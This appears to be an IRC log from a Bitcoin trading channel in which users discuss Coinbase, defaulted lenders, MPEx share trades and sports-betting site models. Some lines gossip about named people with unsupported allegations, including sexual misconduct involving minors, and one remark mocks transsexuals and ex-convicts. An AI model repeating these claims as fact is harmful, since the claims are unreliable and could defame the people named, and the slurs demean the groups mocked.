them getting any press tbh Jan 07 04:11:10 i see them struggling in a flypaper venue with bad make-up on Jan 07 04:13:13 for my curiosity, anyone here actually use coinbase ? Jan 07 04:13:39 no Jan 07 04:13:55 there was discussion on it in -otc the other day, i didnt see any use for it at all Jan 07 04:14:16 cause yeah, i wanted to ask iof they actually have a value proposition that i've overlooked Jan 07 04:14:21 but a few said they just loved being able to send ach from their bank to a bootstrap site and get bitcoins at mygox + 1% Jan 07 04:14:25 as i understand it it's about two years late. Jan 07 04:15:27 http://trilema.com/2012/lets-have-fun-with-paul-graham/#comment-91256 sadly the guy offers no hint. Jan 07 04:16:30 well it seems worse than piuk's even cause i think they are just straight mybitcoin 2.0 no we dont hold your keys tricks Jan 07 04:16:51 for one. Jan 07 04:17:07 for the other, at least in blockchain's case i have some feel of who's behind Jan 07 04:17:13 coinbase, who's that ? Jan 07 04:17:32 what turned me off before i even looked at the site and saw "hosted bitcoin wallet" was the spammy .1 btc refferal scheme Jan 07 04:18:24 i'm not sure i'd hold something like that against a new service. maybe. Jan 07 04:18:32 how did the scheme work ? Jan 07 04:20:16 Wow, just finding this classic thread Jan 07 04:20:18 https://bitcointalk.org/index.php?topic=39922.40 Jan 07 04:20:30 a bunch of newbs contantly beg you to open a new coinbase account and get free btc if you hook up you bank account Jan 07 04:21:08 I requested a withdrawal of 0.1 BTC from my account. Jan 07 04:21:08 My BTCJAM account was debited 0.0955 BTC Jan 07 04:21:08 On my address I received 0.095 BTC Jan 07 04:21:12 dbl fee! Jan 07 04:21:20 pigeons you ever withdrew from btcjam ? Jan 07 04:21:45 Bugpowder that shit was so weird back in like 2011 Jan 07 04:21:46 yep Jan 07 04:22:02 pigeons so does it work as it's supposed and this stuff i keep reading is basically noobish nonsense ? Jan 07 04:22:14 btcjam? Jan 07 04:22:32 its like formalized forum begging/scamming Jan 07 04:22:58 haha Jan 07 04:23:02 so malaysian Jan 07 04:23:19 https://bitcointalk.org/index.php?topic=40264.msg1438731#msg1438731 hey what do you know, turns out the guy with the rounding was actually a blockchain user lol Jan 07 04:24:10 Bugpowder: now find MNW's 'totally legit pictures of underage girls in swimsuits' Jan 07 04:24:10 "Truly, I'm puzzled by Joel's defense of Mr. Starfish, especially after Patrick's default and disappearance. I can think of few scammers in this cesspool who are more blatant and deserve less sympathy than Patrick." Jan 07 04:24:17 i wish i understood wtf fly bit katz on that one. Jan 07 04:24:29 http://blog.coinbase.com/post/33197656699/coinbase-now-storing-87-of-customer-funds-offline Jan 07 04:24:38 Bugpowder: oh and who could forget amir's 'skype phonesex with two 16 y/o' Jan 07 04:24:58 cuz its legal in the uk Jan 07 04:25:30 dub transcript ? Jan 07 04:25:34 (are there any hms ?) Jan 07 04:25:48 a few people posted that they'd used it Jan 07 04:25:56 "Offline storage (sometimes called “cold storage”) is the process of taking money that is connected to the internet and moving it offline for safe keeping." Jan 07 04:26:03 this is such a good definition. Jan 07 04:26:14 much safer on plastic housed usb sticks Jan 07 04:26:16 shows a deep, fundamental understanding of the truck/pipes issue. Jan 07 04:26:50 Why do this? Well, any computer that is connected to the internet with money on it (or bitcoins) is a target for hackers. Keeping servers secure involves many variables and is it’s own area of study and research. Under normal conditions this level of security should be sufficient, but payment apps are held to a higher standard. Jan 07 04:27:06 high comedy. you can always trust pigeon's link. they don't contain porn in the sense of tit and cunt. Jan 07 04:27:13 heh Jan 07 04:27:18 they contain porn of a more intellectual and much more obscene nature. Jan 07 04:27:23 or should i say unnature. Jan 07 04:27:33 I will do ANYTHING to make bitcoin better for the good of humanity!! Oh and I'm going to pimp some quesitonably legal sexual exploitation to make a fast buck Jan 07 04:27:54 dub http://media.tumblr.com/tumblr_mbljnoTsTN1qznqfn.jpg ? Jan 07 04:28:02 mircea_popescu: high comedy? Jan 07 04:28:04 im not hitting that from work Jan 07 04:28:08 do. Jan 07 04:28:32 no nudity Jan 07 04:28:43 dub lol Jan 07 04:28:47 it's off the coinbase blog at any rate. Jan 07 04:28:48 you can hit it Jan 07 04:29:03 tho it does meet the questionable legal explotaition part. maybe no fast bux Jan 07 04:29:06 I really love that photo thread though Jan 07 04:29:15 It's actually kinda useful Jan 07 04:29:17 got a thing for floating azns ? Jan 07 04:29:18 stuff to know Jan 07 04:29:26 "2011 will no doubt be remembered as the year that Bitcoinica took Bitcoin by storm. With leveraged trading, playing the Bitcoin markets went from tee-ball to the big leagues, seemingly overnight. 2012, however, will take things to a whole new level. Mt.Gox and Tradehill have both hinted at the fact that they will be unveiling futures and options markets as part of their development plan, with Mt.Gox possibly br Jan 07 04:29:44 lol this blog Jan 07 04:29:51 hinted at the fact Jan 07 04:30:03 lol. Jan 07 04:30:18 srsly, options were this big thing, imminent in like, July 2011. Jan 07 04:30:50 https://bitcointalk.org/index.php?topic=135071.msg1438315#msg1438315 what nao JWU42 ? Jan 07 04:31:08 o wait nm missed his reply. Jan 07 04:31:38 my good freind usagi had to comment ;) Jan 07 04:31:51 lol Jan 07 04:32:19 so basically, you're piling up your share and plan to distribute it when ? Jan 07 04:32:35 ideally later this week if it stays private Jan 07 04:32:43 if what stays private you mean ? Jan 07 04:33:12 it is not relisted on a new exchange and payments are made directly to the holders Jan 07 04:33:43 it might take longer to begin payouts if it is listed on a new exhcnage as then holders would need to create accounts, etc. Jan 07 04:33:50 o o i see. Jan 07 04:33:58 "SO I believe a remedy is available to JWU. It's simple -- something akin to... give up his current stake in YABMC. I.e. ~500 BTC." Jan 07 04:34:05 and the whole "unregulated securities" concerns of listing again Jan 07 04:34:27 probably cleanest to just disburse. i don't see why any sane exchange would want a wreck listed to beghin with Jan 07 04:34:33 Bugpowder: yeah - I have the BTC ready to go and plan to Jan 07 04:34:58 as of Friday was around 48 BTC Jan 07 04:35:00 482 Jan 07 04:35:01 how much did you get burned for, all told ? Jan 07 04:35:19 I don't trust usagi's valuation models. Jan 07 04:35:50 I didn't get burned per se Jan 07 04:36:02 just intangibles ? (goodwill etc) Jan 07 04:36:09 I suppose it is the bondholders are are getting less than they deserve Jan 07 04:36:16 Anyone heard anything from/about Amazingrando by the way? Jan 07 04:36:26 since the payout would be ~ 60% of what it should have been Jan 07 04:36:37 Namworld: he just posted in his thread Jan 07 04:36:51 mircea_popescu: yeah - some damaged goodwill perhaps Jan 07 04:37:13 well... that's ahead of the game. i guess if you survive you might end up a banker or something. Jan 07 04:37:18 are not HK and PH already tagged? Jan 07 04:37:25 dub: they are Jan 07 04:37:41 yeah. Jan 07 04:37:49 Damn. He's not answering my PMs Jan 07 04:38:00 I suppose conspiro... was not aware when he first posted Jan 07 04:38:12 cannot remember his full handle ;) Jan 07 04:38:16 sphere Jan 07 04:38:21 .tk Jan 07 04:38:23 ;) Jan 07 04:39:07 ;;getrating PatrickHarnett Jan 07 04:39:07 WARNING: Currently not authenticated. User PatrickHarnett, rated since Tue Mar 6 14:02:32 2012. Cumulative rating 67, from 27 total ratings. Received ratings: 23 positive, 4 negative. Sent ratings: 22 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=PatrickHarnett Jan 07 04:39:37 heh Jan 07 04:39:40 it even took a while for Pirate to get to a negative rating Jan 07 04:39:58 people don't look at that often and tend to rate only when transacting Jan 07 04:40:16 https://bitcointalk.org/index.php?topic=133144.msg1438861#msg1438861 this thread kicks ass Jan 07 04:40:25 usagi's asset list Jan 07 04:40:37 OBSI.HRPT (10,089 shares) Jan 07 04:40:47 that's almost as much as i was short Jan 07 04:41:01 Matthew N. Wright debt (750 bitcoins) Hashking Debt (550 btc) Imsaguy debt (approx. 300 BTC) Jan 07 04:41:18 ya lol Jan 07 04:41:21 i was about to paste that. Jan 07 04:41:22 I forgot to rate PH... Jan 07 04:41:24 Done Jan 07 04:41:31 quality junk there Jan 07 04:41:33 GSDPT (6,000 shares (remaining) Jan 07 04:41:41 if only... Jan 07 04:41:58 I rated Pirate like an eternity after he defaulted... and was his first negative rating. Jan 07 04:42:10 ahh - he has 30 shares of YABMC Jan 07 04:42:27 "PPT debt (everything from goat to brendio direct -- if you really want this just PM me)" Jan 07 04:42:41 ya 6k gsdpt is worth a little, iirc they were even with s.dice ? Jan 07 04:42:45 damn Jan 07 04:42:46 hahah mnw Jan 07 04:42:50 Namworld i doubt you were. Jan 07 04:42:51 33K of BIB.BVPS Jan 07 04:43:12 so 1 million btc worth of worthlessness = 0 btc Jan 07 04:43:24 ;;getrating pirateat40 Jan 07 04:43:24 WARNING: Currently not authenticated. User pirateat40, rated since Mon Aug 1 14:18:45 2011. Cumulative rating -119, from 89 total ratings. Received ratings: 56 positive, 33 negative. Sent ratings: 65 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40 Jan 07 04:43:25 ^ Win Jan 07 04:43:26 ya you were, 2 days Jan 07 04:43:48 o wait, that's where the missing bvps was. usagi ? Jan 07 04:44:13 I have a few thousand BIB.BVPS as well Jan 07 04:44:19 Hey... I want those S.BVPS shares. Jan 07 04:44:22 is brendio mia? Jan 07 04:44:30 need to foigure when brendio is gonna opay the past few months dvis Jan 07 04:44:35 well, using usagi's valuation model, we should probably discount the hashking debt to 75% of par Jan 07 04:44:59 pigeons he hasn't shown up lately, we used to chat ocasionally back like last summer. Jan 07 04:45:04 Is S.BVPS not paying divs anymore or what? Jan 07 04:45:11 iirc they paid like 1.5 total Jan 07 04:45:13 what was the 1.5 BTC payment? Jan 07 04:45:46 dividends on no profit Jan 07 04:46:01 no profit? 1 time charge? Jan 07 04:46:06 discounting of goodwill Jan 07 04:46:08 ? Jan 07 04:46:23 last spoke to Brendio on Dec 7th it seems Jan 07 04:46:25 bitvps was down all month? Jan 07 04:46:35 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFvQWJnZnRZQWJfbk1mNHYtVzhPR0E#gid=0 Jan 07 04:46:55 tx Jan 07 04:47:07 We'd have ~300$ more profit if we didn't buy a WHMCS owned license. Jan 07 04:47:14 Now we won't pay it monthly Jan 07 04:47:33 that sounds forward lookin g:) Jan 07 04:47:52 well that looks like a wonderful business Jan 07 04:47:52 Still far less then previous dividends. Jan 07 04:48:09 3 measly BTC Jan 07 04:48:19 that means I get like a satoshi per share Jan 07 04:48:22 heh Jan 07 04:48:27 ok i guess i have to post comparison Jan 07 04:48:31 https://docs.google.com/spreadsheet/ccc?key=0AkGjIAZQI3fydHpEZWl4RFhnelJwd2xqWE5LeFF0TGc#gid=0 Jan 07 04:48:44 https://bitcointalk.org/index.php?topic=134966.msg1437892#msg1437892 Jan 07 04:48:47 ahaha that's my girl. Jan 07 04:48:47 from some MOB or something ltc asset Jan 07 04:48:50 That's actually 300 satoshi per share. Jan 07 04:48:54 But yeah. Jan 07 04:49:32 We'd have close to 30 BTC profit without that fixed cost thing. Jan 07 04:49:40 Ihttp://www.youtube.com/watch?v=98958txVSrE Jan 07 04:49:47 http://www.youtube.com/watch?v=98958txVSrE Jan 07 04:50:27 We'll also be spending on advertisement and getting software which will cost. Jan 07 04:50:59 ok so it's like a 1 time charge? Jan 07 04:51:33 i'm waiting for my, email about how new management is gonna be so responsive and stuff Jan 07 04:51:38 yes, 324$ owned instead of monthly. You still pay 50$ per year for updates. Jan 07 04:51:45 wtf! That Credit Score is hilarious Jan 07 04:51:47 Otherwise it's 19$ monthly Jan 07 04:52:23 228$ per year, less 50$ for yearly updates, 178$ saved each year. Jan 07 04:52:25 I want to kill myself but I can't. Jan 07 04:52:30 usagi fails even at failure Jan 07 04:52:33 why and why not ? Jan 07 04:52:40 o, you were quoting. Jan 07 04:53:34 How can ANYONE's time be worth so little as to be skimming percentages off of sub 1 BTC loans and making a spreadsheet of them. Google Jan 07 04:53:40 "Friedcat still verifies shares. Today i got my confirmation for 1252 shares. GLBSE official data infos. So im safed now because my things with glbse are cleared finally." Jan 07 04:54:02 Google's server costs to host that page are more then the value of the stuff being tracked. Jan 07 04:54:11 heheh :) Jan 07 04:54:19 Bugpowder i think you have no idea what they squeeze out of a server. Jan 07 04:54:29 i'd guess their per-spreadsheet costs are under a satoshi. Jan 07 04:55:16 what about the calories burnt entering the data into the spreadsheet. those cost money Jan 07 04:55:22 and the power to the laptop Jan 07 04:56:02 some people really are worthless. Jan 07 04:56:12 xbabyboy4021x 0.25 8% 30 Days every 7 days DEFAULT Sold To Smiley (0.15) Jan 07 04:56:13 YES Jan 07 04:56:32 lol Jan 07 04:56:33 Wait spreadsheets for less than 1 BTC of debts? Jan 07 04:56:47 i posted it 2 days in a row now Jan 07 04:56:50 0.25 btc in default sold for .15 this guy should work for BoA Jan 07 04:56:57 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdFItM2RwdWU3VHJMeldkSm1IckZNbUE#gid=0 Jan 07 04:57:01 Was able to sell my distressed package of loans for 0.15BTC. 0.1 was written off. Jan 07 04:57:10 heh Jan 07 04:57:19 Well it started with 269 BTC of debt. But I guess it's now a 0.04 BTC of debt spreadsheet xD Jan 07 04:57:36 so let me share a sad, dark secret. Jan 07 04:57:42 today i went to a local comedy show. Jan 07 04:58:03 LTC loans, little tiny children loans. Jan 07 04:58:13 i was bored out of my fucking mind. in spite of paying like 8 bux tgo be there and also being with a bunch of friends so we just made fun of the comedians the whole time Jan 07 04:58:21 then i come to irc, im laughing my ass off for the past two hours. Jan 07 04:58:31 you can't buy a pencil at the elementary school shop Jan 07 04:58:35 for 0.1BTC Jan 07 04:58:36 i wish to sell my quality comedy club time (2 hours) for .1 btc now. Jan 07 04:59:28 So, is BitcoinsDirect still the best place to get large # of coins for US people? Jan 07 04:59:54 Got a friend that is ready to dip his toe in Jan 07 04:59:58 dont think i've heard of it Jan 07 05:00:03 i never heard of that ? Jan 07 05:00:12 Tangible Cryptography's service Jan 07 05:00:16 i thought dt and mtgox were it Jan 07 05:00:21 o, is that what he calls it ? Jan 07 05:00:25 ya Jan 07 05:00:29 a ok. then prolly. Jan 07 05:00:36 it was AWESOME last time. Jan 07 05:00:38 wasn't it fc3g or some shit Jan 07 05:00:56 walk into bank fill out slip, get coins 1% below gox like 2 hours later Jan 07 05:01:04 if he has coins. Jan 07 05:02:16 send him to bruce wagner! Jan 07 05:03:55 Is the S.BBET IPO going to go off EXACTLY at midnight Jan 11th, or is it going to be human-triggered around that time? Jan 07 05:05:03 i just keep hitting refresh Jan 07 05:05:16 [MPEX] [S.DICE] 129 @ 0.00462375 = 0.5965 BTC [+] Jan 07 05:05:16 [MPEX] [S.DICE] 494 @ 0.00463274 = 2.2886 BTC [+] Jan 07 05:05:18 [MPEX] [S.DICE] 600 @ 0.00464937 = 2.7896 BTC [+] Jan 07 05:05:19 [MPEX] [S.DICE] 2063 @ 0.0046669 = 9.6278 BTC [+] Jan 07 05:05:37 S.DICEEEE Jan 07 05:05:42 !ticker S.DICE Jan 07 05:05:43 [MPEX:S.DICE] 1day: 0.00430002 / 0.00447985 / 0.0046669 (83804 shares, 375.43 BTC), 30day: 0.0014 / 0.00333524 / 0.0048 (13850953 shares, 46,196.31 BTC) Jan 07 05:05:45 Bugpowder why dowes it make a diff ? Jan 07 05:06:06 you should be able to figure that out Jan 07 05:07:35 Bugpowder: you could also sell coins too Jan 07 05:07:36 I just want to know when I need to have any orders place by to get that initial allotment Jan 07 05:07:40 fastcash4bitcoins Jan 07 05:07:49 I don't need to sell coins Jan 07 05:07:52 I need to buy coins Jan 07 05:08:03 you buy coins and give people cash? Jan 07 05:08:06 or the other way around? Jan 07 05:08:57 i get cash from friend, I buy coins, I send coins to friend and I either have another few hundred coins for my fund, or MP gets another 30BTC account fee. Jan 07 05:09:07 druggie Jan 07 05:09:15 lol Jan 07 05:09:20 nop Jan 07 05:10:06 Bugpowder it will be automated, but for my own edumancation Jan 07 05:10:10 cuz i still don't see the diff. Jan 07 05:10:45 why should I provide pricing info to other bidders until just before the event starts Jan 07 05:10:46 You don't have a MPEx account yet? Jan 07 05:10:58 friend does not have account Jan 07 05:11:02 oh Jan 07 05:11:16 Don't forget to give them your public MPEx key =P Jan 07 05:11:39 I am too bad at GPG to get the joke :( Jan 07 05:11:42 i still don't see how other bidders can use that info is the thing. Jan 07 05:11:43 did havelock ever show a signed statement? Jan 07 05:11:53 It's not a joke =/ Jan 07 05:12:13 You refer them have them mention your account ID (public key fingerprint) Jan 07 05:12:23 ahhhh! Jan 07 05:12:30 ty Jan 07 05:12:34 whats the bonus? Jan 07 05:12:41 Mircea credits both account with 5 BTC Jan 07 05:12:48 kewl Jan 07 05:13:14 Well, seems like people are still not aware of the referral system =/ Jan 07 05:13:18 Well, I'm not sure if witholding info will make a difference or not. But I think it will Jan 07 05:14:08 Allow me to place bids for optimal allotments based on the existing bids Jan 07 05:14:26 without having others change their bid in time to counter me. Jan 07 05:14:29 ebay style Jan 07 05:14:40 but now I have revealed my strategy so ;( Jan 07 05:14:55 IPO sniping was big sport on glbse Jan 07 05:16:07 thestringpuller: i looked through a box for ff7 Jan 07 05:16:08 wasnt in that one Jan 07 05:16:12 i think its under some other stuff in a crate Jan 07 05:16:17 gonna try to look in an hour Jan 07 05:16:22 way to get my hopes up Jan 07 05:17:45 holyshit they come out small Jan 07 05:17:47 http://www.youtube.com/watch?v=MQ_eeDvCo8U Jan 07 05:19:26 im thinking it's equally likely that waiting will get you a benefit or a loss Jan 07 05:19:33 on one hand, the guy with the top bid is guaranteed sharex Jan 07 05:19:48 on the other, if he gets sold through then you can get shares cheaper later Jan 07 05:20:09 Bugpowder: that's cool as shit. marsupials (sp) ftw Jan 07 05:20:39 It will be an interesting experiment Jan 07 05:21:01 I don't know if I like the mutual betting model with time-weighting though Jan 07 05:21:49 Bugpowder: is this what you spend your freetime watching? Jan 07 05:21:50 lol Jan 07 05:21:59 I have used betsofbitco.in for a long time, and I think the time-weighting diminishes betting volume closer to the event, which is when more people want to be, due to time value of money Jan 07 05:22:22 it's not set in stone. Jan 07 05:22:25 I just want a bitcoin sportsbook with traditional moneyline and pointspreads Jan 07 05:22:32 ya whio;s gonna maintain it ? Jan 07 05:22:35 thestringpuller got it off the twitter Jan 07 05:23:09 Well, you could go based off the hilton lines Jan 07 05:23:37 and if you have a decent bankroll you can at least allow betting based on the spread Jan 07 05:23:50 and just up the juice a bit more than a trad book Jan 07 05:24:05 to deal with the low volume / high variance Jan 07 05:25:00 "you" Jan 07 05:25:01 who ? Jan 07 05:25:30 whoever has coins, some betting knowledge, website knowledge and a dream Jan 07 05:25:57 There are other problems with the mutual model. It's very hard to get large bets going Jan 07 05:25:59 betting knowledge? Jan 07 05:26:00 lol Jan 07 05:26:02 ... Jan 07 05:26:13 dude. you completely misrepresent the total lack of competence in bitcoin Jan 07 05:26:13 You need a vegas sharp to partner with Jan 07 05:26:29 there's like, 100 or so coders, most incompetent, a few bright, some acceptable Jan 07 05:26:40 ok Jan 07 05:26:42 there's like 1-2k preop transsexuals, random internet kids Jan 07 05:27:02 there's a bunch of ex cons that are all against the state for the very phylosophycal reason that they have priors Jan 07 05:27:06 and that's it. Jan 07 05:27:09 there isn't a bookie. Jan 07 05:27:19 there is (maybe) a grand total of two lawyers Jan 07 05:27:23 of which one's a paralegal or some shit. Jan 07 05:27:28 with the mutual model, if you want to lay 100BTC down, you need to have faith that other people will bet up the other side to an acceptable odds level Jan 07 05:27:36 which is rare Jan 07 05:27:58 lol Jan 07 05:28:04 well... it's not so rare, there's 100 btc bets Jan 07 05:28:07 Only BFL shit really gets BTCs over 10 Jan 07 05:28:10 but i can appreciate the point. Jan 07 05:28:18 thats an excellent summary of the bitcoin community Jan 07 05:28:21 ty. Jan 07 05:28:24 I have done a LOT of betting on betsofbitco.in Jan 07 05:28:28 i work hard and pay top dollar for my research. Jan 07 05:29:02 I have tried the strategy of betting on BOTH sides of my event just to get the bet size big enough Jan 07 05:29:13 for it to be worth it Jan 07 05:29:31 i was gonna say, with parimutuel you can always take both sides Jan 07 05:29:51 cause usually, if you bet big on one side, you get fucked. Jan 07 05:30:08 if you have a spread you bet each side of the spread Jan 07 05:30:14 and wait for close to closure to wipe it. Jan 07 05:30:23 you can make decent money as a bookie on the system as it is, if you actually know odds. Jan 07 05:31:35 As an alternative model, you pull the football game spread off some vegas site, take any bets that come on either side, and adjust the vig to encourage betting on the side that isn't getting hit as hard. Then the bet size is decoupled from the odds. Jan 07 05:31:53 This only works if you are doing events that have a spread Jan 07 05:31:55 or that. Jan 07 05:32:00 but people want to bet on sports Jan 07 05:32:10 but suppose the event is 7:2 to buy , 1:3 to sell (just random numbers) Jan 07 05:32:14 Lots of money on football Jan 07 05:32:43 where should I buy stocks? Jan 07 05:32:49 dr-g what stocks ? Jan 07 05:33:01 satoshi dice for example Jan 07 05:33:02 naw. The spread in the seahawks-skins game was +3.5 for seahawks. Jan 07 05:33:07 just wanna have a few Jan 07 05:33:09 How much coin do you have? Jan 07 05:33:19 Dr-G you probably want a broker then. Jan 07 05:33:44 oh you're the MPE something guy, your stuff is cool but too complicated for me ;) Jan 07 05:34:08 Err -3.5 for seahawks Jan 07 05:34:17 yeah. Jan 07 05:34:25 so if the seahawks score at least 4 points more than skins, you win the bet Jan 07 05:34:31 you can try coinbr.com, or else bitfunder has a passthrough Jan 07 05:34:58 Bugpowder im really useless with sports betting, i never did it nor do i much care about sports Jan 07 05:35:19 then you charge 110btc to bet on either side, and if you win you get your bet + 100 back. Jan 07 05:35:24 if you lose, you lose the 110 Jan 07 05:35:25 but im just saying, you can put 50/30 btc in, then wait for other bettors to contribute theior own then make a final bet to adjust to reasonable rate either way Jan 07 05:36:19 if people keep banging on one side, you adjust the vig, i.e. you charge 150 to win 100 on the side with too much action Jan 07 05:36:45 If it gets really bad, you move the spread to a new number, i.e. -5.5 Jan 07 05:36:53 This is the way it works, and it works very well Jan 07 05:37:50 I am actually amazed that nobody has built this site. Jan 07 05:37:58 hmmm.... Jan 07 05:38:14 lol Jan 07 05:39:49 [MPEX] [S.DICE] 1137 @ 0.0046669 = 5.3063 BTC [+] Jan 07 05:39:50 [MPEX] [S.DICE] 563 @ 0.00467507 = 2.6321 BTC [+] Jan 07 05:40:26 [MPEX] [S.DICE] 1032 @ 0.00467507 = 4.8247 BTC [+] Jan 07 05:40:27 [MPEX] [S.DICE] 644 @ 0.00477874 = 3.0775 BTC [+] Jan 07 05:41:08 anyway, I think the betsofbitco.in model is flawed for the most popular topic of betting, sports, and only works for certain long-dated events with a lot of ebb and flow to the apparent odds, that juice the bet value. When there is a site that does Vegas style odds making, I'm going all in in that IPO. Jan 07 05:45:14 !ticker s.dice Jan 07 05:45:15 [MPEX:S.DICE] 1day: 0.00430002 / 0.00449038 / 0.00477874 (84890 shares, 381.19 BTC), 30day: 0.0014 / 0.00333557 / 0.0048 (13854329 shares, 46,212.15 BTC) Jan 07 05:45:49 it'd seem the value of that model strictly depends on the quality of the bookie. Jan 07 05:46:02 s.dice is worth 500k btc right now ^^ Jan 07 05:46:11 or 430k Jan 07 05:47:40 on 30day avg 333557. on 1 day avg 449038 Jan 07 05:49:34 minus the 250 btc I robbed :P Jan 07 05:49:54 ha Jan 07 05:50:11 the only way to win long term is to take the winnings and buy the stock :-P Jan 07 05:50:52 some dood was doing this Jan 07 05:51:01 "i won 16btc and promptly turned around and bought the stock" Jan 07 05:51:04 i was like... yeah. Jan 07 05:51:33 hehe Jan 07 05:53:35 still a better transaction than that pizza transaction Jan 07 05:58:31 [MPEX] [S.MPOE] 1200 @ 0.00064105 = 0.7693 BTC [+] Jan 07 05:58:32 [MPEX] [S.MPOE] 10027 @ 0.00064106 = 6.4279 BTC [+] Jan 07 05:58:33 [MPEX] [S.MPOE] 2315 @ 0.00064366 = 1.4901 BTC [+] Jan 07 06:01:32 Hey, at the time, a measly 10 000 BTC for a pizza was an amazing deal on such gastronomy food. Jan 07 06:01:54 yeah i don't get the ridicule either Jan 07 06:01:54 was this when btc was worth 10 cents a coin? Jan 07 06:02:02 err 1 cent Jan 07 06:02:39 Even less than 1 cent Jan 07 06:02:42 without being willing to accept bitcoins for pizza, we never would have been able to trade anything for bitcoins Jan 07 06:03:19 uhhh Jan 07 06:04:01 i would have happily given that many for pizza too, but no one else was willing to take them for something valuable like pizza Jan 07 06:04:10 haha Jan 07 06:04:21 one way of measuring you value in science is to ask, if I never existed, how far would it have set back the field, in terms of time. Jan 07 06:04:47 that's why first thing i did with the time machine was kill Bugpowder's grandpa Jan 07 06:04:49 if the bitcoin pizza man never existed, we would have been set back a few days Jan 07 06:05:20 i hope you mean days in bitcoin time, cause it would have been more than that, by far Jan 07 06:06:26 how long before another man ordered a pizza Jan 07 06:07:14 thestringpuller it was possibly the first time an item of value was exchanged for this internet funny nonsense Jan 07 06:07:15 maybe would have been never Jan 07 06:07:31 ya, what pigeons said Jan 07 06:07:48 but certainly wasn't necessarily a few days imminent Jan 07 06:08:23 fuck not again Jan 07 06:08:42 neighbour is leaving for work and im still up Jan 07 06:08:47 fuck his wif ? Jan 07 06:08:49 +e Jan 07 06:08:56 lol Jan 07 06:09:14 i was trying to get back to a normal pace Jan 07 06:09:34 o, that kind of up Jan 07 06:09:41 whatever normal means. Jan 07 06:30:33 kakobrekla: you are a hacker there is no normal circadian rythym for us Jan 07 06:31:37 heh Jan 07 06:41:31 thestringpuller: k, going back to the garage to try to find the discs again Jan 07 06:42:37 cool Jan 07 06:43:16 [MPEX] [S.DICE] 224 @ 0.00466586 = 1.0452 BTC [-] Jan 07 06:44:15 [MPEX] [S.DICE] 2584 @ 0.00466586 = 12.0566 BTC [-] Jan 07 06:44:17 [MPEX] [S.DICE] 600 @ 0.00474291 = 2.8457 BTC [+] Jan 07 06:44:18 [MPEX] [S.DICE] 1200 @ 0.00474292 = 5.6915 BTC [+] Jan 07 06:44:19 [MPEX] [S.DICE] 1456 @ 0.00477874 = 6.9578 BTC [+] Jan 07 06:44:20 [MPEX] [S.DICE] 9160 @ 0.0047888 = 43.8654 BTC [+] Jan 07 06:51:50 [MPEX] [O.BTCUSD.C110T] 645 @ 0.30139779 = 194.4016 BTC [+] Jan 07 07:01:53 Ukto: what's the current fee for listing a new asset on bitfunder? Jan 07 07:34:50 I am extending the 3btc thru jan at least Jan 07 07:35:29 thestringpuller Jan 07 07:35:32 i have goot news Jan 07 07:35:58 oh cool Jan 07 07:40:11 kakobrekla http://www.google.com/finance?cid=668090 Jan 07 07:40:15 le loll. watch bitbet own it. Jan 07 07:43:01 [MPEX] [S.DICE] 1648 @ 0.0047888 = 7.8919 BTC [+] Jan 07 07:45:36 It's 0.0045 on bitfunder. Jan 07 07:48:24 Ukto: how much you want for it Jan 07 07:49:17 1... BILLIONG (pinkeys) bitcoins Jan 07 07:49:18 >,> Jan 07 07:51:49 so more bitcoins than will ever exist? Jan 07 07:52:19 [MPEX] [S.DICE] 4250 @ 0.0047888 = 20.3524 BTC [+] Jan 07 07:53:32 deal. Jan 07 07:53:34 :P Jan 07 07:53:41 what was the original deal? Jan 07 07:53:45 5btc? Jan 07 07:53:55 although Jan 07 07:53:59 i am concerned about disc.. 2 Jan 07 07:54:10 i can faintly see some light circular scratches Jan 07 07:54:16 but being black bottom Jan 07 07:54:18 its shiney as hell Jan 07 07:54:27 its not enough to feel with a fingernail Jan 07 07:54:34 or just a finger Jan 07 07:55:06 but if you run your nail back and forth over it, it does make a slight noise :/ Jan 07 08:04:35 [MPEX] [S.MPOE] 8050 @ 0.0006405 = 5.156 BTC [-] Jan 07 08:14:43 http://trilema.com/2013/bitbet/ Jan 07 08:14:47 if anyone's looking for a laugh Jan 07 08:14:49 kakobrekla ^^ Jan 07 08:40:49 !ticker s.dice Jan 07 08:40:51 [MPEX:S.DICE] 1day: 0.00430002 / 0.00455893 / 0.0047888 (99863 shares, 455.27 BTC), 30day: 0.0014 / 0.00333775 / 0.0048 (13875451 shares, 46,312.85 BTC) Jan 07 08:41:09 make me rich Jan 07 08:45:40 they say that's how the 1929 panic started. Jan 07 08:46:21 rah! Jan 07 08:46:33 I can't freakin view it, no credit as ever... Jan 07 08:46:44 I never ever have darn credits. Jan 07 08:48:16 life is short but unfair. Jan 07 08:49:14 but I haven't been able to read your blog in months, except right after that time you gave me 100 free credit. Jan 07 08:50:50 [MPEX] [S.DICE] 3900 @ 0.0047888 = 18.6763 BTC [+] Jan 07 08:51:39 are you on open wifi or something ? Jan 07 08:52:09 Nope Jan 07 08:53:37 [MPEX] [S.DICE] 2900 @ 0.0047888 = 13.8875 BTC [+] Jan 07 08:57:00 Yeah I seriously don't know Jan 07 08:57:29 This is really odd... Jan 07 08:57:50 we need bitcoin mania 2.0 Jan 07 09:01:00 Hey Namworld Jan 07 09:01:11 just wondering, what is happening to btc-mining? Jan 07 09:01:34 Only 15 BTC in holdings? Jan 07 09:03:13 The rest was loaned to Amazingrando as per motion in exchange of hashing, until such day we could buy some ASIC rig. Jan 07 09:03:56 So, there has being no dividends from when GLBSE shut down to now? Jan 07 09:03:59 is that marked down as loss ? Jan 07 09:04:32 I'll have to see about that. Jan 07 09:05:01 Amazingrando isn't very active. Just moved his Bitbond to cryptostock and nothing then. Jan 07 09:08:00 i see. Jan 07 09:09:26 Was pretty much: "My mining doesn't cover eletricity fees anymore, so I'll stop paying divs. See you when ASICs ship." Jan 07 09:11:36 hence 15 btc in holdings Jan 07 09:28:14 Indeed. Jan 07 09:28:47 Well I guess the only people happy are BTC-BOND holders. Jan 07 09:39:52 [MPEX] [S.MPOE] 10599 @ 0.00064366 = 6.8222 BTC [+] Jan 07 09:42:52 Well, I just updated my bitcointalk.org signature, mircea Jan 07 09:43:01 https://bitcointalk.org/index.php?topic=94271.0 Jan 07 09:43:16 My biz + BitVPS + MPEx Jan 07 09:43:40 Since I'm now working on both + BitVPS is on MPEx, seems appropriate. Jan 07 09:46:27 We also have an ad slot: https://bitcointalk.org/adrotate.php?adinfo Jan 07 09:56:43 cool. Jan 07 10:01:26 Those 